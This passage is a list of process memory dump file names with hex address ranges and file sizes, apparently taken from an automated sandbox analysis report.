memory/4540-129-0x00000000055D0000-0x0000000005BD6000-memory.dmpFilesize
6.0MB
-
memory/4612-390-0x0000000000000000-mapping.dmp
-
memory/4652-372-0x0000000000000000-mapping.dmp
-
memory/4680-374-0x0000000000000000-mapping.dmp
-
memory/4728-147-0x0000000002720000-0x0000000002765000-memory.dmpFilesize
276KB
-
memory/4728-153-0x000000006FF80000-0x000000006FFCB000-memory.dmpFilesize
300KB
-
memory/4728-130-0x0000000000000000-mapping.dmp
-
memory/4728-137-0x0000000073C20000-0x0000000073D11000-memory.dmpFilesize
964KB
-
memory/4728-136-0x0000000075E80000-0x0000000076042000-memory.dmpFilesize
1.8MB
-
memory/4728-150-0x00000000747D0000-0x0000000075B18000-memory.dmpFilesize
19.3MB
-
memory/4728-138-0x0000000000930000-0x0000000000931000-memory.dmpFilesize
4KB
-
memory/4728-148-0x0000000003050000-0x0000000003051000-memory.dmpFilesize
4KB
-
memory/4728-134-0x0000000000910000-0x0000000000911000-memory.dmpFilesize
4KB
-
memory/4728-140-0x0000000071D30000-0x0000000071DB0000-memory.dmpFilesize
512KB
-
memory/4728-133-0x0000000000930000-0x000000000099C000-memory.dmpFilesize
432KB
-
memory/4728-146-0x0000000076220000-0x00000000767A4000-memory.dmpFilesize
5.5MB
-
memory/4864-388-0x0000000000000000-mapping.dmp
-
memory/4920-383-0x0000000000000000-mapping.dmp
-
memory/5028-446-0x0000000000000000-mapping.dmp
-
memory/5064-448-0x0000000000000000-mapping.dmp
-
memory/5116-427-0x0000000000000000-mapping.dmp